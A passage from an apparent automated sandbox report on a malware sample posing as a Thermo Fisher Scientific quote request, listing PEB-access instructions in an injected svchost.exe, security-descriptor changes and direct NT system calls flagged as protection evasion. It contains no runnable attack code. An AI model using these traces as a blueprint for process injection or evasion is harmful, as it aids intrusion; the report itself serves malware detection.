                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]2_2_03B2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]2_2_03B5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]2_2_03B5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03BBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03BDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]2_2_03B2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h]2_2_03BDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]2_2_03BE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]2_2_03BE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]2_2_03BFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]2_2_03BD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]2_2_03B86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]2_2_03B68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]2_2_03C04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]2_2_03B30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]2_2_03B6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]2_2_03B6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]2_2_03B5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]2_2_03BBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h]2_2_03BDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]2_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03BBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]2_2_03B649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03BFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]2_2_03BC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]2_2_03BB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]2_2_03BC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]2_2_03BBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]2_2_03BBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]2_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]2_2_03BB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h]2_2_03C008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]2_2_03BBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]2_2_03B30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03BFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03B5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h]2_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A830 mov eax, dword ptr fs:[00000030h]2_2_03B6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h]2_2_03BD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h]2_2_03BD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC810 mov eax, dword ptr fs:[00000030h]2_2_03BBC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE872 mov eax, dword ptr fs:[00000030h]2_2_03BBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE872 mov eax, dword ptr fs:[00000030h]2_2_03BBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6870 mov eax, dword ptr fs:[00000030h]2_2_03BC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6870 mov eax, dword ptr fs:[00000030h]2_2_03BC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60854 mov eax, dword ptr fs:[00000030h]2_2_03B60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34859 mov eax, dword ptr fs:[00000030h]2_2_03B34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34859 mov eax, dword ptr fs:[00000030h]2_2_03B34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B42840 mov ecx, dword ptr fs:[00000030h]2_2_03B42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04FE7 mov eax, dword ptr fs:[00000030h]2_2_03C04FE7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62F98 mov eax, dword ptr fs:[00000030h]2_2_03B62F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62F98 mov eax, dword ptr fs:[00000030h]2_2_03B62F98
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0063A66C
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006281AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006281AC
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00628189 SetUnhandledExceptionFilter,0_2_00628189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
